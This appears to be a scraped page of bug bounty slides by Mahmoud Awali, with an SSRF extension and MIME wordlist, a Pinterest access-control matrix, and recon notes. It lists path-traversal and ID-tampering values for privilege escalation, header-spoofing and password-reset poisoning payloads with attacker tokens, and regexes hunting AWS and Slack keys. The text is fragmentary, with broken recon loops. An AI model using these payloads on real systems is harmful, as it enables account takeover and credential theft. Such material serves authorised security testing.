application/srgs+xml application/x-font-ghostscript image/x-xpixmap
application/vnd.ms-excel.template.macroenabled.12
application/sru+xml application/x-font-linux-psf image/x-xwindowdump
application/vnd.ms-fontobject
application/ssml+xml application/x-font-otf message/rfc822
application/vnd.ms-htmlhelp
application/tei+xml application/x-font-pcf model/iges
application/vnd.ms-ims
application/thraud+xml application/x-font-snf model/mesh
application/vnd.ms-lrm
application/timestamped-data application/x-font-ttf model/vnd.collada+xml
application/vnd.ms-officetheme
application/vnd.3gpp.pic-bw-large application/x-font-type1 model/vnd.dwf
application/vnd.ms-pki.seccat
application/vnd.3gpp.pic-bw-small application/x-font-woff model/vnd.gdl
application/vnd.ms-pki.stl
application/vnd.3gpp.pic-bw-var application/x-freearc model/vnd.gtw
application/vnd.ms-powerpoint
application/vnd.3gpp2.tcap application/x-futuresplash model/vnd.mts
application/vnd.ms-powerpoint.addin.macroenabled.12
application/vnd.3m.post-it-notes application/x-gnumeric model/vnd.vtu
application/vnd.ms-powerpoint.presentation.macroenabled.12
application/vnd.accpac.simply.aso application/x-gtar model/vrml
application/vnd.ms-powerpoint.slide.macroenabled.12
application/vnd.accpac.simply.imp application/x-gzip multipart/x-mixed-replace
application/vnd.ms-powerpoint.slideshow.macroenabled.12
application/vnd.acucobol application/x-hdf test/mimetype
application/vnd.ms-powerpoint.template.macroenabled.12
application/vnd.acucorp application/x-iso9660-image test/mimetype/test
application/vnd.ms-project
application/vnd.adobe.air-application-installer-package+zip application/x-java-jnlp-file text/cache-manifest
application/vnd.ms-word.document.macroenabled.12
application/vnd.adobe.fxp application/x-killustrator text/calendar
application/vnd.ms-word.template.macroenabled.12
application/vnd.adobe.xdp+xml application/x-krita text/css
application/vnd.ms-works
application/vnd.adobe.xfdf application/x-latex text/csv
application/vnd.ms-wpl
application/vnd.ahead.space application/x-mobipocket-ebook text/html
application/vnd.ms-xpsdocument
application/vnd.airzip.filesecure.azf application/x-ms-application text/javascript
application/vnd.mseq
application/vnd.airzip.filesecure.azs application/x-ms-wmd text/markdown
application/vnd.musician
application/vnd.amazon.ebook application/x-ms-wmz text/mathml
application/vnd.muvee.style
application/vnd.americandynamics.acc application/x-ms-xbap text/n3
application/vnd.neurolanguage.nlu
application/vnd.amiga.ami application/x-msaccess text/plain
application/vnd.noblenet-directory
application/vnd.android.package-archive application/x-msbinder text/plain-bas
application/vnd.noblenet-sealer
application/vnd.anser-web-certificate-issue-initiation application/x-mscardfile text/prs.lines.tag
application/vnd.noblenet-web
application/vnd.anser-web-funds-transfer-initiation application/x-msclip text/rdf
application/vnd.nokia.n-gage.data
application/vnd.antix.game-component application/x-msdownload text/richtext
application/vnd.nokia.n-gage.symbian.install
application/vnd.apple.installer+xml application/x-msmediaview text/sgml
application/vnd.nokia.radio-preset
application/vnd.apple.mpegurl application/x-msmetafile text/tab-separated-values
application/vnd.nokia.radio-presets
application/vnd.arastra.swi application/x-msmoney text/troff
application/vnd.novadigm.edm
application/vnd.aristanetworks.swi application/x-mspublisher text/turtle
application/vnd.novadigm.edx
application/vnd.audiograph application/x-msschedule text/uri-list
application/vnd.novadigm.ext
application/vnd.blueice.multipass application/x-msterminal text/vnd.curl
application/vnd.oasis.opendocument.chart
application/vnd.bmi application/x-mswrite text/vnd.curl.dcurl
application/vnd.oasis.opendocument.chart-template
application/vnd.businessobjects application/x-netcdf text/vnd.curl.mcurl
application/vnd.oasis.opendocument.database
application/vnd.chemdraw+xml application/x-perl text/vnd.curl.scurl
application/vnd.oasis.opendocument.formula
application/vnd.chipnuts.karaoke-mmd application/x-php text/vnd.fly
application/vnd.oasis.opendocument.formula-template
application/vnd.cinderella application/x-pkcs12 text/vnd.fmi.flexstor
application/vnd.oasis.opendocument.graphics
application/vnd.claymore application/x-pkcs7-certificates text/vnd.graphviz
application/vnd.oasis.opendocument.graphics-template
application/vnd.cloanto.rp9 application/x-pkcs7-certreqresp text/vnd.in3d.3dml
application/vnd.oasis.opendocument.image
application/vnd.clonk.c4group application/x-python-code text/vnd.in3d.spot
application/vnd.oasis.opendocument.image-template
application/vnd.cluetrust.cartomobile-config application/x-rar-compressed text/vnd.sun.j2me.app-descriptor
application/vnd.oasis.opendocument.presentation
application/vnd.cluetrust.cartomobile-config-pkg application/x-redhat-package-manager text/vnd.wap.si
application/vnd.oasis.opendocument.presentation-template
application/vnd.commonspace application/x-rpm text/vnd.wap.sl
application/vnd.oasis.opendocument.spreadsheet
application/vnd.contact.cmsg application/x-sh text/vnd.wap.wml
application/vnd.oasis.opendocument.spreadsheet-template
application/vnd.cosmocaller application/x-shar text/vnd.wap.wmlscript
application/vnd.oasis.opendocument.text
application/vnd.crick.clicker application/x-shellscript text/vtt
application/vnd.oasis.opendocument.text-master
application/vnd.crick.clicker.keyboard application/x-shockwave-flash text/x-asm
application/vnd.oasis.opendocument.text-template
application/vnd.crick.clicker.palette application/x-silverlight-app text/x-c
application/vnd.oasis.opendocument.text-web
application/vnd.crick.clicker.template application/x-sqlite3 text/x-fortran
application/vnd.olpc-sugar
application/vnd.crick.clicker.wordbank application/x-stuffit text/x-java-source
application/vnd.oma.dd2+xml
application/vnd.criticaltools.wbs+xml application/x-stuffitx text/x-java-source,java
application/vnd.openofficeorg.extension
application/vnd.ctc-posml application/x-sv4cpio text/x-markdown
application/vnd.openxmlformats-officedocument.presentationml.presentati
application/vnd.cups-ppd application/x-sv4crc text/x-pascal
on
application/vnd.curl.car application/x-tar text/x-python
application/vnd.openxmlformats-officedocument.presentationml.slide
application/vnd.curl.pcurl application/x-tcl text/x-setext
application/vnd.openxmlformats-officedocument.presentationml.slideshow
application/vnd.data-vision.rdz application/x-tex text/x-uuencode
application/vnd.openxmlformats-officedocument.presentationml.template
application/vnd.debian.binary-package application/x-tex-tfm text/x-vcalendar
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
application/vnd.denovo.fcselayout-link application/x-texinfo text/x-vcard
application/vnd.openxmlformats-officedocument.spreadsheetml.template
application/vnd.dna application/x-trash text/xml
application/vnd.openxmlformats-officedocument.wordprocessingml.docum
application/vnd.dolby.mlp application/x-ustar text/xsl
ent
application/vnd.dpgraph application/x-wais-source text/yaml
application/vnd.openxmlformats-officedocument.wordprocessingml.templa
application/vnd.dreamfactory application/x-x509-ca-cert video/3gpp
te
application/vnd.dvb.ait application/x-xfig video/3gpp2
application/vnd.osgeo.mapguide.package
application/vnd.dvb.service application/x-xpinstall video/h261
application/vnd.osgi.dp
application/vnd.dynageo application/x-zip-compressed video/h263
application/vnd.palm
application/vnd.ecowin.chart application/xcap-diff+xml video/h264
application/vnd.pawaafile
application/vnd.enliven application/xenc+xml video/jpeg
application/vnd.pg.format
application/vnd.epson.esf application/xhtml+xml video/jpm
application/vnd.pg.osasli
application/vnd.epson.msf application/xml video/mj2
application/vnd.picsel
application/vnd.epson.quickanime application/xml-dtd video/mp2t
application/vnd.pmi.widget
application/vnd.epson.salt application/xop+xml video/mp4
application/vnd.pocketlearn
application/vnd.epson.ssf application/xslt+xml video/mpeg
application/vnd.powerbuilder6
application/vnd.eszigno3+xml application/xspf+xml video/ogg
application/vnd.previewsystems.box
application/vnd.ezpix-album application/xv+xml video/quicktime
application/vnd.proteus.magazine
application/vnd.ezpix-package application/yaml video/vnd.dece.hd
application/vnd.publishare-delta-tree
application/vnd.fdf application/yang video/vnd.dece.mobile
application/vnd.pvi.ptid1
application/vnd.fdsn.mseed application/yin+xml video/vnd.dece.pd
application/vnd.quark.quarkxpress
application/vnd.fdsn.seed application/zip video/vnd.dece.sd
application/vnd.rar
application/vnd.flographit application/zip-compressed video/vnd.dece.video
application/vnd.realvnc.bed
application/vnd.fluxtime.clip audio/3gpp2 video/vnd.fvt
application/vnd.recordare.musicxml
application/vnd.framemaker audio/aac video/vnd.mpegurl
application/vnd.recordare.musicxml+xml
application/vnd.frogans.fnc audio/aacp video/vnd.ms-playready.media.pyv
application/vnd.rig.cryptonote
application/vnd.frogans.ltf audio/adpcm video/vnd.uvvu.mp4
application/vnd.rim.cod
application/vnd.fsc.weblaunch audio/aiff video/vnd.vivo
application/vnd.rn-realmedia
application/vnd.fujitsu.oasys audio/basic video/webm
application/vnd.route66.link66+xml
application/vnd.fujitsu.oasys2 audio/flac video/x-f4v
application/vnd.sailingtracker.track
application/vnd.fujitsu.oasys3 audio/midi video/x-fli
application/vnd.seemail
application/vnd.fujitsu.oasysgp audio/mp4 video/x-flv
application/vnd.sema
application/vnd.fujitsu.oasysprs audio/mp4a-latm video/x-m4v
application/vnd.semd
application/vnd.fujixerox.ddd audio/mpeg video/x-ms-asf
application/vnd.semf
application/vnd.fujixerox.docuworks audio/ogg video/x-ms-wm
application/vnd.shana.informed.formdata
application/vnd.fujixerox.docuworks.binder audio/opus video/x-ms-wmv
application/vnd.shana.informed.formtemplate
application/vnd.fuzzysheet audio/vnd.dece.audio video/x-ms-wmx
application/vnd.shana.informed.interchange
application/vnd.genomatix.tuxedo audio/vnd.digital-winds video/x-ms-wvx
application/vnd.shana.informed.package
application/vnd.geogebra.file audio/vnd.dra video/x-msvideo
application/vnd.simtech-mindmapper
application/vnd.geogebra.tool audio/vnd.dts video/x-sgi-movie
application/vnd.smaf
application/vnd.geometry-explorer audio/vnd.dts.hd x-conference/x-cooltalk
application/vnd.smart.teacher
application/vnd.geonext audio/vnd.lucent.voice
application/vnd.solent.sdkm+xml
application/vnd.spotfire.dxp
Server-Side Request Forgery
4 - Extensions Wordlist

123 flx msh

3dml fly msi sit
3g2 fm msl sitx
3ga fnc msty skd
3gp for mts skm
3gp2 fpx mus skp
3gpa frame musicxml skt
3gpp fsc mvb sl
3gpp2 fst mwf slc
7z ftc mxf sldm
a fti mxl sldx
aab fvt mxml slt
aac fxp mxs sm
aacp fzs mxu smf
aam g2w n-gage smi
aas g3 n3 smil
abw g3w nb snd
abwgz gac nbp snf
ac gbr nc so
acc gcode ncx soap
ace gdl nef spc
actions geo ngdat spf
acu gex nlu spl
acutc ggb nml spot
adp ggt nnd spp
aep ghf nns spq
aff gif nnw spx
afm gim node sqlite
afp gmx npx sqlite-shm
ahead gnumeric nsf sqlite-wal
ai gph nws sqlite3
aif gpx o sr2
aiff gqf oa2 src
air gqs oa3 srf
ait gram oas sru
ami gre obd srx
apk grv obj sse
application grxml oda ssf
apr gsf odb ssml
arc gtar odc st
arw gtm odf stc
asa gtw odft std
asc gv odg stf
asf gxt odi sti
asm gz odm stk
aso h odp stl
asp h261 ods stm
aspx h263 odt str
atc h264 oga stw
atom hal ogg sub
atomcat hbci ogv sus
atomsvc hdf ogx susp
atx heic onepkg sv4cpio
au heif onetmp sv4crc
avi hh onetoc svc
avif hlp onetoc2 svd
avifs hpgl opf svg
aw hpid oprc svgz
azf hps opus swa
azs hqx orf swf
azw htke org swi
bat htm osf sxc
bcpio html osfpvg sxd
bdf htmlde otc sxg
bdm hvd otf sxi
bed hvp otg sxm
bh2 hvs oth sxw
bin hxt oti t
bmi i2g otm tao
bmp icc otp tar
book ice ots tcap
box icm ott tcl
boz icns oxt teacher
bpk ico p tei
btif ics p10 test
bz ief p12 tex
bz2 ifb p7b texi
c ifm p7c texinfo
c11amc iges p7m text
c11amz igl p7r tfi
c4d igm p7s tfm
c4f igs p8 tgz
c4g igx par thmx
c4p iif pas tif
c4u imp paw tiff
cab ims pbd tmo
car in pbm torrent
cat inc pcf tpl
cc ipfix pcl tpt
cct ipk pclxl tr
ccxml irm pct tra
cda irp pcurl trm
cdbcmsg iso pcx ts
cdf isoimg pdb tsd
cdkey itp pdf tsv
cdmia ivp pef ttc
cdmic ivu pfa ttf
cdmid jad pfb ttl
cdmio jam pfm twd
cdmiq jar pfr twds
cdr java pfx txd
cdx jfi pgif txf
cdxml jfif pgm txt
cdy jfif-tbnl pgn u32
cer jif pgp udeb
cfc jisp phar ufd
cfm jlt php ufdl
cfml jnlp php3 umj
cgi joda php4 unityweb
cgm jpe php5 uoml
chat jpeg php7 uri
chm jpg phps uris
chrt jpgm phpt urls
cif jpgv pht ustar
cii jpm phtm utz
cil js phtml uu
cla json pic uva
class jsonld pjpeg uvh
clkk jsp pjpg uvi
clkp jspf pkg uvm
clkt jspx pki uvp
clkw jsv pkipath uvs
clkx jsw pl uvu
clp k25 plb uvv
cmc kar plc vcd
cmdf karbon plf vcf
cml kdc pls vcg
cmp kfo pm vcs
cmx kia pml vcx
cod kil png vis
com kml pnm viv
conf kmz portpkg vml
config kne pot vor
cpio knp potm vox
cpp kon potx vrml
cpt kpr pp vsd
cr2 kpt ppa vsdx
crd kra ppam vsf
crl krz ppd vss
crt ksh ppm vssm
crw ksp pps vssx
cryptonote ktr ppsm vst
csh ktx ppsx vstm
csml ktz ppt vstx
csp kwd pptm vsw
css kwt pptx vtu
cst lasxml pqa vxml
csv latex prc w3d
cu lbd pre wad
curl lbe prf wasm
cww les prql wav
cxt lha ps wax
cxx lib psb wbmp
dae link66 psd wbs
daf list psf wbxml
dataless list3820 pskcxml wcm
davmount listafp ptid wdb
db log ptx weba
db-shm lostxml pub webm
db-wal lrf pvb webp
dbm lrm pwn wg
dcr ltf pwz wgt
dcurl lvp py wiz
dd2 lwp pya wks
ddd lzh pyc wm
deb m13 pyo wma
def m14 pyv wmd
deploy m1v qam wmf
der m21 qbo wml
dfac m2a qfx wmlc
dic m2v qps wmls
diff m3a qt wmlsc
dir m3u qwd wmv
dis m3u8 qwt wmx
dist m4a qxb wmz
distz m4b qxd woff
djv m4p qxl woff2
djvu m4r qxt wpd
dll m4v ra wpl
dmg ma raf wps
dms mads ram wqd
dna mag rar wri
dng maker ras wrl
do man raw wsdl
doc markdn rcprofile wspolicy
docm markdown rdf wss
docx mathml rdz wtb
dot mb rep wvx
dotm mbk res x32
dotx mbox rgb x3d
dp mc1 rif x3f
dpg mcd rip xap
dra mcurl rl xar
dsc md rlc xbap
dssc mdb rld xbd
dtb mdi rm xbm
dtd mdown rmi xdf
dts me rmp xdm
dtshd mesh rms xdp
dump meta4 rnc xdssc
dvi mets roff xdw
dwf mfm rp9 xenc
dwg mgp rpa xer
dxf mgz rpm xfdf
dxp mht rpss xfdl
dxr mhtml rpst xht
ecelp4800 mid rq xhtml
ecelp7470 midi rs xhvml
ecelp9600 mif rsd xif
ecma mime rss xla
edm mj2 rtf xlam
edx mjp2 rtx xlb
efif mjs rw2 xlc
ei6 mka rwl xlm
elc mlp s xls
eml mmd saf xlsb
emma mmf sbml xlsm
eol mml sc xlsx
eot mmr scd xlt
eps mno scm xltm
epub mny scq xltx
erf mobi scs xlw
es mods scurl xml
es3 mov sda xo
esf movie sdc xop
et3 mp2 sdd xpdl
etx mp2a sdkd xpi
exe mp3 sdkm xpm
exi mp4 sdp xpr
ext mp4a sdw xps
ez mp4s see xpw
ez2 mp4v seed xpx
ez3 mpa sema xsd
f mpc semd xsf
f4v mpe semf xsl
f77 mpeg ser xslt
f90 mpg setpay xsm
fbs mpg4 setreg xspf
fcs mpga sfd-hdstx xul
fdf mpkg sfs xvm
fe_launch mpm sgl xvml
fg5 mpn sgm xwd
fgd mpp sgml xyz
fh mpt sh yaml
fh4 mpy shar yang
fh5 mqy shf yin
fh7 mrc shtm yml
fhc mrcx shtml zabw
fig mrw si zaz
flac ms sic zip
fli mscml sig zir
flo mseed silo zirz
flv mseq sis zmm
flw msf sisx
Broken Access Control
1 - Access Control Matrix

Pinterest Business Account Broken Access Control Matrix :)

Owner Manger Employee Partner User Anonymous

View and Add

Business Employees ✅ ✅ ❌ ❌ ❌ ❌

Delete
Business Employees ✅ ✅ ❌ ❌ ❌ ❌

View and Add

Business Partners ✅ ✅ ❌ ❌ ❌ ❌

Delete
Business Partners ✅ ✅ ❌ ❌ ❌ ❌

View and Add

Ad Account ✅ ✅ ❌ ❌ ❌ ❌

Delete
Ad Account ❌ ✅ ❌ ❌ ❌ ❌

Assign and Delete

Employees to Ad Account ✅ ✅ ❌ ✅ ❌ ❌

Assign and Update

Employees Permissions ✅ ✅ ❌ ✅ ❌ ❌

View
Employees ✅ ✅ ❌ ❌ ❌ ❌

Assign and Delete

Partners to Ad Account ✅ ✅ ❌ ❌ ❌ ❌

Assign and Update

Partners Permissions ✅ ✅ ❌ ❌ ❌ ❌

Assign and Delete

Employees or Partners to Proﬁles ✅ ✅ ❌ ❌ ❌ ❌

Create and Update

Asset groups ✅ ✅ ❌ ❌ ❌ ❌

Assign and Delete

Assets or Members to Asset ✅ ✅ ❌ ❌ ❌ ❌
groups

Pinterest Business Ad Account Broken Access Control Matrix :)

Owner Partner Manger Admin Analyst Audience Finance Campaign Catalogs Employee User anonymous

Create and Update

Campaigns , Ad Groups and ✅ ‼ ‼ ✅ ❌ ❌ ❌ ✅ ❌ ❌ ❌ ❌
Ads

View
Billing and Business settings ✅ ‼ ‼ ✅ ❌ ❌ ✅ ✅ ❌ ❌ ❌ ❌

Update
Billing and Business settings ✅ ‼ ‼ ✅ ❌ ❌ ✅ ❌ ❌ ❌ ❌ ❌

View Reporting ✅ ‼ ‼ ✅ ✅ ❌ ❌ ✅ ❌ ❌ ❌ ❌

View Conversion tags ✅ ‼ ‼ ✅ ✅ ✅ ❌ ✅ ❌ ❌ ❌ ❌

Create and Update

Conversion tags ✅ ‼ ‼ ✅ ❌ ❌ ❌ ✅ ❌ ❌ ❌ ❌

View Audiences ✅ ‼ ‼ ✅ ✅ ✅ ❌ ✅ ❌ ❌ ❌ ❌

Create and Update

Audiences ✅ ‼ ‼ ✅ ❌ ✅ ❌ ❌ ❌ ❌ ❌ ❌

View Analytics ✅ ‼ ‼ ✅ ✅ ❌ ❌ ❌ ❌ ❌ ❌ ❌

Create and Update

Data sources and Product ✅ ‼ ‼ ✅ ❌ ❌ ❌ ❌ ✅ ❌ ❌ ❌
groups

Upload
Conversion ﬁles in Ads Manager ✅ ‼ ‼ ✅ ✅ ✅ ❌ ✅ ❌ ❌ ❌ ❌
Broken Access Control
2 - Vertical Privilege Escalation

Admin=true Change False to True

X-Original-URL: /admin
X-Rewrite-Url: /admin
URL Spoofing

POST GET PUT DELETE Change Methods

Broken Access Control

3 - Horizontal Privilege Escalation

id=/
id=../
id=..%2f
id=%2e%2e%2f
id=%252e%252e%252f Change Your ID to Victim ID
id=victim-ID
id=victim-ID; User Info
id=victim-ID%3B Downloads Files
id=victim-ID%23
id=victim-ID%A0
id=Your-ID/../Victim-ID HTTP Parameter Pollution
id=Your-ID/..%2fVictim-ID
id=Your-ID/%2e%2e%2fVictim-ID
id=Your-ID/%252e%252e%252fVictim-ID
id=Your-ID&id=Victim-ID
Reset Password
1 - Manipulate Reset Password

X-Forwarded-Host: me.com
X-Forwarded-Server
X-Forwarded-Host
X-Forwarded-Host: company.com
X-Forwarded-For
X-Forwarded-Host: me.com
True-Client-IP
X-Client-IP
X-Real-IP X-Forwarded-Host: company.com
Host X-Forwarded-Host: me.com
X-Forwarded-Host: me.com

[email protected]&[email protected]
email[][email protected]&email[][email protected]
{"email":"[email protected]","email":"[email protected]"}
{"email":["[email protected]","[email protected]"]}

email=🅥[email protected]

[email protected]
[email protected]
Race Condition
….
[email protected]

[email protected]&&[email protected]=Attacker-Token
[email protected]&token=Attacker-Token
[email protected]&token=NULL
[email protected]&token=
Thank
You
Mahmoud M. Awali
@0xAwali

Ccpenx Aws Demo
No ratings yet
Ccpenx Aws Demo
4 pages
Configuration Yaml
No ratings yet
Configuration Yaml
5 pages
Challenge 5
100% (1)
Challenge 5
22 pages
CEH PRACTICAL NOTES - Pratik Karan
No ratings yet
CEH PRACTICAL NOTES - Pratik Karan
23 pages
Hacking Tools Cheat Sheet v1.0 PDF
50% (2)
Hacking Tools Cheat Sheet v1.0 PDF
2 pages
Web Component Essentials
No ratings yet
Web Component Essentials
120 pages
Hacking Tools Cheat Sheet v1.0 PDF
100% (1)
Hacking Tools Cheat Sheet v1.0 PDF
2 pages
Mastering Proxmox - Second Edition
From Everand
Mastering Proxmox - Second Edition
Wasim Ahmed
No ratings yet
Gray Box Web AppSec Test Plan Finding
No ratings yet
Gray Box Web AppSec Test Plan Finding
46 pages
Awesome One-Liner Bug Bounty
No ratings yet
Awesome One-Liner Bug Bounty
14 pages
Awesome One-Liner Bug Bounty
No ratings yet
Awesome One-Liner Bug Bounty
7 pages
Onliners by NurHabib
No ratings yet
Onliners by NurHabib
6 pages
Amassive Leap in Host Discovery
No ratings yet
Amassive Leap in Host Discovery
23 pages
Recon Cheat Sheet: For Further Information Visit
No ratings yet
Recon Cheat Sheet: For Further Information Visit
2 pages
Ipgrabflashx Raw
No ratings yet
Ipgrabflashx Raw
9 pages
Recon Methdology and Notes....
No ratings yet
Recon Methdology and Notes....
4 pages
Bug Bounty Cheatsheet
100% (2)
Bug Bounty Cheatsheet
31 pages
Shodan Dork Cheat Sheet
No ratings yet
Shodan Dork Cheat Sheet
6 pages
Bug Bounty Cheatsheet PDF
100% (1)
Bug Bounty Cheatsheet PDF
30 pages
Some Tips To Earn Your First Bounty To Find XSS, Blind-XSS, SQLI, SSRF, LFI, LOG4J Using Some Handy Automation Tools. - by Emad Shanab - Medium
No ratings yet
Some Tips To Earn Your First Bounty To Find XSS, Blind-XSS, SQLI, SSRF, LFI, LOG4J Using Some Handy Automation Tools. - by Emad Shanab - Medium
34 pages
The Art of Gathering Information
No ratings yet
The Art of Gathering Information
26 pages
Reconsubdomains
No ratings yet
Reconsubdomains
3 pages
Web Attack Cheat Sheet
No ratings yet
Web Attack Cheat Sheet
42 pages
Pentest Tips and Tricks #2 - EK
No ratings yet
Pentest Tips and Tricks #2 - EK
16 pages
Vulnerability Assessment Scripts Frameworks Command List 1724007513
No ratings yet
Vulnerability Assessment Scripts Frameworks Command List 1724007513
13 pages
Multi-Node OCP Cluster Installation Steps 2
No ratings yet
Multi-Node OCP Cluster Installation Steps 2
15 pages
It's The Little Things (Part 2) Final - Public
No ratings yet
It's The Little Things (Part 2) Final - Public
113 pages
One Liner1
No ratings yet
One Liner1
1 page
ADV1 ST
No ratings yet
ADV1 ST
6 pages
Chapter 4 - Gathering Information
No ratings yet
Chapter 4 - Gathering Information
38 pages
Health Check Cheat-Sheet
No ratings yet
Health Check Cheat-Sheet
4 pages
Bug Bounty CHK
No ratings yet
Bug Bounty CHK
2 pages
M0chan Bug Bounty Cheatsheet
No ratings yet
M0chan Bug Bounty Cheatsheet
43 pages
Reconnaissance
No ratings yet
Reconnaissance
50 pages
Web Attack Cheat Sheet
No ratings yet
Web Attack Cheat Sheet
42 pages
Recon For Web Pen-Testing
No ratings yet
Recon For Web Pen-Testing
17 pages
Log
No ratings yet
Log
25 pages
Ingress - Kubernetes On AWS 0.1 Documentation
No ratings yet
Ingress - Kubernetes On AWS 0.1 Documentation
5 pages
Bug Bounty Cheatsheet
100% (1)
Bug Bounty Cheatsheet
32 pages
Hades
No ratings yet
Hades
36 pages
DNS Footprinting
No ratings yet
DNS Footprinting
7 pages
Recon NG
No ratings yet
Recon NG
3 pages
VAPTTT
No ratings yet
VAPTTT
46 pages
Javascript Files
No ratings yet
Javascript Files
21 pages
Bug Bounty Tips - Tricks
No ratings yet
Bug Bounty Tips - Tricks
101 pages
Linux Hacking - Tools - Cheat - Sheet - v2.0
100% (1)
Linux Hacking - Tools - Cheat - Sheet - v2.0
3 pages
Seguranca Ofensiva
No ratings yet
Seguranca Ofensiva
12 pages
OSINT CheatSheet
No ratings yet
OSINT CheatSheet
8 pages
How To Scan/exploit A SSL Based Webserver. - Version 1.0 21-09-2003
No ratings yet
How To Scan/exploit A SSL Based Webserver. - Version 1.0 21-09-2003
5 pages
Https Scanning PDF
No ratings yet
Https Scanning PDF
5 pages
IbrahimBello Pentesting VulnerabilityAssessmentProject
No ratings yet
IbrahimBello Pentesting VulnerabilityAssessmentProject
14 pages
Recon NG Guide
100% (1)
Recon NG Guide
29 pages
PSNA Dec 2024
No ratings yet
PSNA Dec 2024
5 pages
0xsp Offensive Cheatsheet
No ratings yet
0xsp Offensive Cheatsheet
19 pages
Instruction
No ratings yet
Instruction
1 page
Rest Api For Humans
No ratings yet
Rest Api For Humans
99 pages
Gradiant.com - Copy
No ratings yet
Gradiant.com - Copy
3 pages
AnswerSheet Part4
No ratings yet
AnswerSheet Part4
73 pages
Hacking Tools Cheat Sheet: Basic Linux Networking Tools
100% (4)
Hacking Tools Cheat Sheet: Basic Linux Networking Tools
2 pages
DNSSEC Mastery, 2nd edition: IT Mastery, #18
From Everand
DNSSEC Mastery, 2nd edition: IT Mastery, #18
Michael W. Lucas
No ratings yet
Mastering Python Network Automation: Automating Container Orchestration, Configuration, and Networking with Terraform, Calico, HAProxy, and Istio
From Everand
Mastering Python Network Automation: Automating Container Orchestration, Configuration, and Networking with Terraform, Calico, HAProxy, and Istio
Tim Peters
No ratings yet
Mastering C++ Network Automation: Run Automation across Configuration Management, Container Orchestration, Kubernetes, and Cloud Networking
From Everand
Mastering C++ Network Automation: Run Automation across Configuration Management, Container Orchestration, Kubernetes, and Cloud Networking
Justin Barbara
No ratings yet
Mobile Application Development
No ratings yet
Mobile Application Development
49 pages
HSC Information Technology Class 12 Commerce Sample Paper 2023
No ratings yet
HSC Information Technology Class 12 Commerce Sample Paper 2023
5 pages
How To Write A Technical Background For Thesis
100% (3)
How To Write A Technical Background For Thesis
7 pages
CCS339 - Crypto Currency Lab Manual
100% (2)
CCS339 - Crypto Currency Lab Manual
53 pages
CQCS - Service Manual
No ratings yet
CQCS - Service Manual
58 pages
Ics343 S03 HW1 202018240
No ratings yet
Ics343 S03 HW1 202018240
8 pages
FAQ's Investment Proofs Submission FY2024-25
No ratings yet
FAQ's Investment Proofs Submission FY2024-25
6 pages
AJ Introduction
No ratings yet
AJ Introduction
31 pages
Swat Luu: User Manual
No ratings yet
Swat Luu: User Manual
13 pages
ServiceNow Interview Questions and Answers by Uday Gadiparthi
100% (1)
ServiceNow Interview Questions and Answers by Uday Gadiparthi
88 pages
Hotspot Server Setup
No ratings yet
Hotspot Server Setup
12 pages
DDW Student Guide v1.0
No ratings yet
DDW Student Guide v1.0
63 pages
HTML Input Types
No ratings yet
HTML Input Types
1 page
Jenkins Setup
No ratings yet
Jenkins Setup
2 pages
3.element, Class, and ID Selectors
No ratings yet
3.element, Class, and ID Selectors
3 pages
Rws Module Week 5 To 8
No ratings yet
Rws Module Week 5 To 8
193 pages
Resume 3.0-2
No ratings yet
Resume 3.0-2
1 page
The Mac Terminal Commands Cheat Sheet
No ratings yet
The Mac Terminal Commands Cheat Sheet
5 pages
Seed Map - Minecraft App
No ratings yet
Seed Map - Minecraft App
1 page
Java Script
No ratings yet
Java Script
109 pages
Web Development Basics
No ratings yet
Web Development Basics
17 pages
Javascript
No ratings yet
Javascript
17 pages
Machines Simulator Instruction Guide
No ratings yet
Machines Simulator Instruction Guide
153 pages
3BUA000156R5021 Sys PostInstall 800xa 5.0
No ratings yet
3BUA000156R5021 Sys PostInstall 800xa 5.0
240 pages
How Do I Use The NY ID Card Generator With Partner XE
No ratings yet
How Do I Use The NY ID Card Generator With Partner XE
7 pages
A Study For An Ideal Password Management System
No ratings yet
A Study For An Ideal Password Management System
7 pages
Exploits Explained:: Comprehensive Exploit Prevention
No ratings yet
Exploits Explained:: Comprehensive Exploit Prevention
16 pages
Get Mastering Modern Linux, Second Edition Paul S Wang Free All Chapters
100% (8)
Get Mastering Modern Linux, Second Edition Paul S Wang Free All Chapters
53 pages

Bug Bounty Hunting

Uploaded by

Bug Bounty Hunting

Uploaded by

Bug Bounty

Web applications Bug Hunter

APK Mobile Applications Root Domains IPv4 Clouds

whois IPs Validation

Subdomains Enumeration Subdomains Brute Forcing Code Environments

APEXs Permutation AND TLDs Alterations

Resolvable Subdomains AND HTTP Service

JS Sensitive Information Disclosure Parameters OR Headers

APK Mobile Applications

APK Mobile Applications

for ((Page = 1 ; Page <= MAX-Page ; Page++))

for ((Page = 1 ; Page <= MAX-Page ; Page++))

SHODANCount=$(curl -s "https://api.shodan.io/shodan/host/search?key=$SHODANKey&query=$SHODANQuery" | jq -r .total)

for ((SHODANPage = 1 ; SHODANPage <= "$SHODANIters" ; SHODANPage++))

CENSYSCount=$(curl -s -u "$CENSYSAPIID":"$CENSYSSecret" -H 'Content-Type: application/json'

for ((CENSYSPage = 1 ; CENSYSPage <= "$CENSYSIters" ; CENSYSPage++))

SHODANCount=$(curl -s "https://api.shodan.io/shodan/host/search?key=$SHODANKey&query=$SHODANQuery" | jq -r .total)

for ((SHODANPage = 1 ; SHODANPage <= "$SHODANIters" ; SHODANPage++))

CENSYSCount=$(curl -s -u "$CENSYSAPIID":"$CENSYSSecret" -H 'Content-Type: application/json'

for ((CENSYSPage = 1 ; CENSYSPage <= "$CENSYSIters" ; CENSYSPage++))

for cird in `cat BGP.txt`

for ROOT in `cat ROOTWORDS.txt`

for tld in `sort -u all-TLD.txt`

Google Search I’m Feeling Lucky

site:ROOT.TLD (signup|sign up|registration)

Root Domains Monitorize

Root Domains Monitorize

for DOMAIN in `sort -u valid-TLD.txt`

for DOMAIN in `sort -u valid-TLD.txt`

for DOMAIN in `sort -u valid-TLD.txt`

for subdomain in file_of_subdomains :

for DOMAIN in `sort -u 3Level-enumeration.txt`

for DOMAIN in `sort -u 3Level-enumeration.txt`

about crazyegg hello ora

for one in `cat COMMONWORDS.txt`

for two in `cat COMMONWORDS.txt`

echo "$two.$one.$1" >> FUZZ-$1.txt

Subdomains Brute Forcing

dnsx -l allsubdomains.txt -json -silent -stats -retry 3 -t 300 | tee -a dnsx-OUT.json

Subdomains Permutation AND Alterations

/(\.|@)ROOT\.TLD/ AND /(ftp|jdbc)/

/(\.|@)ROOT\.TLD/ AND /(xoxp|AIza|AKIA)/

